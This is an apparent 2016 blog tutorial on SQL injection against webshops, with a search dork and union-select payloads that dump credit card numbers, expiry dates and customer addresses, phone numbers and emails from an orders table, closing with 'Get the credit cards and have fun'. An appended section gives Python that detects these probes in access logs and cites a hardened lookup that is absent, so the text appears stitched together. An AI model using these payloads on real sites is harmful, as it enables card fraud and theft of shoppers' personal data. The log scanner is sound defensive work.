Monday 18 April 2016

New SQL Injection Tutorials (Hacking CC)

SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). This is a new tutorial by me on hacking CC (credit cards).

Note: Everything written here is only for educational purposes. If you do any illegal activity, we are not responsible for that.
 
1) We have to search Google for webshops. I used this dork:


Code:
inurl:customer_testimonials.php testimonial_id=


2) Let's say we got this site:



Code:
http://www.JustExample.com/customer_…stimonial_id=7


3) We have to check whether it is vulnerable to SQLi. We add this

Code:

to url :

>>>


Code:
http://www.JustExample.com/customer_…stimonial_id=7


If we get an error, it means the website is vulnerable.

4) We have to check the column count. We try with 10 first:


Code:
+order+by+10--

>>>



Code:
http://www.JustExample.com/customer_…+order+by+10--



If we don't get an error, it means the website has more than 10 columns; if we get an error, it means the website has fewer than 10 columns.

5) This time we get an error, so now we try from 1 to 9:


Code:
+union+select+1,2,3,4,5,6,7,8,9--


>>>


Code:
http://www.JustExample.com/customer_…,4,5,6,7,8,9--


Now we have found it: the website has 9 columns.

6) Most of the time we can get info from column 3 or 6. Let's say this time we can from 3 xD. Now we can get the database user, database name and database version this way:

*- database user


Code:
http://www.JustExample.com/customer_…,4,5,6,7,8,9--


*- database name


Code:
http://www.JustExample.com/customer_…,4,5,6,7,8,9--


*- database version


Code:
http://www.JustExample.com/customer_…,4,5,6,7,8,9--


7) We need the table names. We add this to the URL:


Code:
+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables--




Code:
http://www.JustExample.com/customer_…chema.tables--


8) Now we need the columns. We add this to the URL:

Code:
+union+select+1,2,concat(table_name,char(58),column_name),4,5,6,7,8,9+from+information_schema.columns--


>>>

Code:
http://www.JustExample.com/customer_…hema.columns--

9) Now all we have to do is view the orders and customer info (that is where the credit cards are xD). If we add this to the URL we will get credit card numbers, payment method, credit card type, ...


Code:
+union+select+1,2,concat(payment_method,char(58),cc_type,char(58),cc_number,char(58),cc_expires),4,5,6,7,8,9+from+orders--


>>>


Code:
http://www.JustExample.com/customer_…+from+orders--


If we add this to the URL we will get a lot of info about the customers: address, phone number, e-mail, zip code, and all of the credit card info.


Code:
+union+select+1,2,concat(orders_id,0x2F,cc_type,0x2F,cc_owner,0x2F,cc_number,0x2F,cc_expires,0x2F,customers_street_address,0x2F,customers_suburb,0x2F,customers_city,0x2F,customers_postcode,0x2F,customers_state,0x2F,customers_country,0x2F,customers_telephone,0x2F,customers_email_address,0x2F,date_purchased),4,5,6,7,8,9+from+orders+


>>>


Code:
Welcome! Future Home of Another Amazing Website Powered by Exabytes
/customer_testimonials.php?&testimonial_id=7+union+select+1,2,concat(orders_id,0x2F,cc_type,0x2F,cc_owner,0x2F,cc_number,0x2F,cc_expires,0x2F,customers_street_address,0x2F,customers_suburb,0x2F,customers_city,0x2F,customers_postcode,0x2F,customers_state,0x2F,customers_country,0x2F,customers_telephone,0x2F,customers_email_address,0x2F,date_purchased),4,5,6,7,8,9+from+orders+


Now one step is left.

10) Get the credit cards and have fun....

Don’t forget to use your brain……

ENJOY !!!!
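From the defender's side, every step of the walkthrough above leaves a distinctive trace in the web server's access log: a parameter that is normally a bare number suddenly carries `order by`, `union select`, `information_schema`, `concat(` or a `char(58)`/`0x2F` separator, usually from one address in quick succession and often paired with 500 responses. The following Python is an added example and not part of the original post: it scans constructed Apache-style log lines (the IPs, timestamps and sizes are made up; the request paths reuse the probes shown above) for those markers. It decodes the query string first, because the `+` and `%20` encodings in the URLs above would otherwise hide the keywords from a plain substring match; the function and constant names are mine.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Markers taken from the probes shown in the post, matched after URL decoding.
SQLI_MARKERS = [
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema-enumeration", re.compile(r"\binformation_schema\b", re.I)),
    ("concat-exfil", re.compile(r"\bconcat\s*\(", re.I)),
    ("char-or-hex-separator",
     re.compile(r"\bchar\s*\(\s*\d+\s*\)|\b0x[0-9a-f]{2,}\b", re.I)),
]

# Common Log Format: ip - - [time] "METHOD path HTTP/x" status bytes
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def decoded_query(path):
    """Return the decoded query string so `+` and %xx escapes cannot hide keywords."""
    return unquote_plus(urlsplit(path).query)


def scan_access_log(lines):
    """Return (ip, status, matched marker names, decoded query) for suspicious requests."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        query = decoded_query(m.group("path"))
        hits = [name for name, rx in SQLI_MARKERS if rx.search(query)]
        if hits:
            findings.append((m.group("ip"), int(m.group("status")), hits, query))
    return findings


# Constructed sample lines: IPs, timestamps and sizes are made up; the paths
# reuse the probes from the walkthrough, once with + and once with %20 encoding.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Apr/2016:10:00:01 +0000] "GET /customer_testimonials.php?testimonial_id=7 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [18/Apr/2016:10:00:09 +0000] "GET /customer_testimonials.php?testimonial_id=7+order+by+10-- HTTP/1.1" 500 312',
    '203.0.113.5 - - [18/Apr/2016:10:00:31 +0000] "GET /customer_testimonials.php?testimonial_id=7+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables-- HTTP/1.1" 200 7788',
    '198.51.100.7 - - [18/Apr/2016:10:01:02 +0000] "GET /customer_testimonials.php?testimonial_id=8 HTTP/1.1" 200 5090',
    '203.0.113.5 - - [18/Apr/2016:10:02:15 +0000] "GET /customer_testimonials.php?testimonial_id=7%20union%20select%201,2,concat(table_name,char(58),column_name),4,5,6,7,8,9%20from%20information_schema.columns-- HTTP/1.1" 200 9901',
]

if __name__ == "__main__":
    for ip, status, hits, query in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {status} {','.join(hits)} :: {query}")
```

Keyword matching of this kind is a triage heuristic, not a proof: expect some false positives on free-text parameters and tune the marker list per application. The stronger signals are structural, a parameter that should only ever be an integer arriving as anything else, and a burst of 500 responses from one client on one script, which is exactly what the rejected-input path in the hardened lookup earlier on this page produces.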

